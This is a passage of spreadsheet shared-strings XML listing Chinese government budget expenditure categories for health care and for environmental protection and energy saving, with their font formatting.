      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基本公共卫生服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重大公共卫生服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>突发公共卫生事件应急处理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他公共卫生支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中医药</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中医</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民族医</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>药专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他中医药支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>计划生育事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>计划生育机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>计划生育服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他计划生育事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政事业单位医疗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政单位医疗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>事业单位医疗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公务员医疗补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他行政事业单位医疗支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对基本医疗保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对职工基本医疗保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对城乡居民基本医疗保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>财政对其他基本医疗保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医疗救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡医疗救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>疾病应急救助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他医疗救助支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>优抚对象医疗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>优抚对象医疗补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他优抚对象医疗支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医疗保障管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医疗保障政策管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医疗保障经办事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他医疗保障管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>老龄卫生健康事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>老龄卫生健康事务</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">  育幼服务</t>
  </si>
  <si>
    <t xml:space="preserve">   其他育幼服务支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他卫生健康支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他卫生健康支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>节能环保支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>环境保护管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生态环境保护宣传</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>环境保护法规、规划及标准</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生态环境国际合作及履约</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生态环境保护行政许可</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>应对气候变化管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他环境保护管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>环境监测与监察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>建设项目环评审查与监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>核与辐射安全监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他环境监测与监察支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>污染防治</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>大气</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>噪声</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>固体废弃物与化学品</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>放射源和放射性废物监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>辐射</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>土壤</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他污染防治支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然生态保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生态保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村环境保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生物及物种资源保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>草原生态修复治理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然保护地</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他自然生态保护支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>天然林保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>森林管护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会保险补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政策性社会性支出补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>天然林保护工程建设</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>停伐补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他天然林保护支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退耕还林还草</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退耕现金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退耕还林粮食折现补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退耕还林粮食费用补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退耕还林工程建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他退耕还林还草支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>风沙荒漠治理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>京津风沙源治理工程建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他风沙荒漠治理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退牧还草</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>退牧还草工程建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他退牧还草支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>已垦草原退耕还草</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>已垦草原退耕还草</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>能源节约利用</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>能源节约利用</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
